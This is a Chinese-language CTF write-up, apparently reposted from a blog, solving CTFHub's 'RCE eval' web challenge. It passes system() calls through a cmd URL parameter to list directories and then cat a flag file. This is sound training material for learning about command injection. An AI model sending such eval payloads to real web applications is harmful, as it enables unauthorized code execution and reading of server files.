首页 > 其他分享 >ctfhub web技能树 RCE-eval执行

ctfhub web技能树 RCE-eval执行

时间:2022-11-15 15:11:38浏览次数:64  
标签:web ctfhub cmd system flag eval RCE

ctfhub web技能树 RCE

REC的简介这边大佬有详解:https://blog.csdn.net/qq_43814486/article/details/90020139 

eval执行

一、打开题目

 

 

 二、查看题目信息

  题目这边提示要cmd中查找

 

  输入如下命令:

/?cmd=system("ls");

  展示了一个index.php的文件

 

 三、根据思路找到flag

  继续查看根目录中的是否能有收获

/?cmd=system("ls /");

  这里有一个flag_21737文件

 

 

 

我们继续找下去,应该就可以拿到flag了

 

 

/?cmd=system("cat /flag_21737");

拿到flag啦!

 

 

标签:web,ctfhub,cmd,system,flag,eval,RCE
From: https://www.cnblogs.com/manmanwei/p/16892470.html

相关文章

  • umi配置chainWebpack,使用自定义loader----jsx-px2rem
    前言虽然云谦大佬在github上说了,umi本身的配置已经很完善了,但是肯定满足不了所有人各种各样的奇葩需求。。。比如今天说的将jsx中的style里,将px转换为rem。 umi本身提......
  • webpack配置完全指南
    前言对于入门选手来讲,webpack配置项很多很重,如何快速配置一个可用于线上环境的webpack就是一件值得思考的事情。其实熟悉webpack之后会发现很简单,基础的配置可以分为......
  • 一文彻底读懂webpack常用配置
    开发环境constwebpack=require("webpack");constpath=require('path')module.exports={//entry:{//a:'./src/0706/a.js',//c:'./......
  • webpack高级配置
    摇树(treeshaking)我主要是想说摇树失败的原因(treeshaking失败的原因),先讲下摇树本身效果什么是摇树?举个例子首先webpack.config.js配置constwebpack=require("we......
  • 【Javaweb】六-servlet层
    AdminServlet.jap@WebServlet("/AdminServlet")publicclassAdminServletextendsHttpServlet{@Overrideprotectedvoidservice(HttpServletRequestrequ......
  • Webservice部署
    一、创建WebService1、打开VS2019,创建ASP.NETWEB应用程序(.NETFramework) 2、选空 3.添加新建项,选WEB服务(ASMX) 4.增加自己的服务函数  5.调试运行,看......
  • 传统 Web 框架部署与迁移
    与其说Serverless架构是一个新的概念,不如说它是一种全新的思路,一种新的编程范式。但是原生的Serverless开发框架却非常少。以Web框架为例,目前主流的Web框架“均不......
  • CentOS8.4(Anolis 8.6) Apache 2.4 Web 服务器配置记录(2022.11)
    1.首先安装nginx,因为目前nginx在Web服务市场的占比(26.51%)已经超过Apache(21.40%)。  2.安装nginx步骤(在阿里云虚拟主机CentOS8.4 123.56.43.47中安装)#yum......
  • day31 1 tomcat介绍与创建web项目 & 2 继承HttpServlet类、配置webxml全局配置文件 &
    ServletJavaServlet是运行在Web服务器或应用服务器上的程序,作为客户端(Web浏览器或其他HTTP客户端)和服务端(HTTP服务器上的数据库或应用程序)之间的中间层。使用Servlet可......
  • Web开发前奏
    目录浅谈项目开发企业的web项目类型企业项目开发流程项目来源流程开发模式浅谈项目开发企业的web项目类型1.商城(某某团购)1.1B2C直销商城商家与会员直接交......